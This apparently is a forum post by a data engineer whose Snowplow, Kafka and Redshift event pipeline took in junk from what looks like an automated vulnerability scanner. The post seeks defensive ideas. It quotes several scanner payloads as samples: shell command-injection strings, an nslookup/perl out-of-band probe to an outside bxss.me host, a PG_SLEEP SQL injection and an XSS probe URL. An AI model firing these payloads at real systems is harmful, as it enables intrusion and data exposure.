A brief infrastructure setup: we gather user events data in mobile apps (iOS, Android) and Web via Snowplow trackers, send it to Kafka queues, then land the data into DWH (Redshift) staging area.
Looks like a vulnerability scanner is used. Take a look at the sample data:
echo bvazvs$()\ igzdlg\nz^xyu||a #' &echo bvazvs$()\ igzdlg\nz^xyu||a #|" &echo bvazvs$()\ igzdlg\nz^xyu||a #Despite basic checks are enforced (non-empty string, valid json), around 1k events managed to get into DWH 😐
bxss.me/t/xss.html?%00
`(nslookup hitxbheyywgyq5e37d.bxss.me||perl -e "gethostbyname('hitxbheyywgyq5e37d.bxss.me')")`
aUV52Y1o' OR 826=(SELECT 826 FROM PG_SLEEP(15))--
^(#$!@#$)(()))******
What I've done so far:
1. Filtered out and deleted problem rows from database
2. Enforced data type checks
Curious case. Finally I have faced with tech pirates 😵💫
Let's see if it works fine. Any other ideas?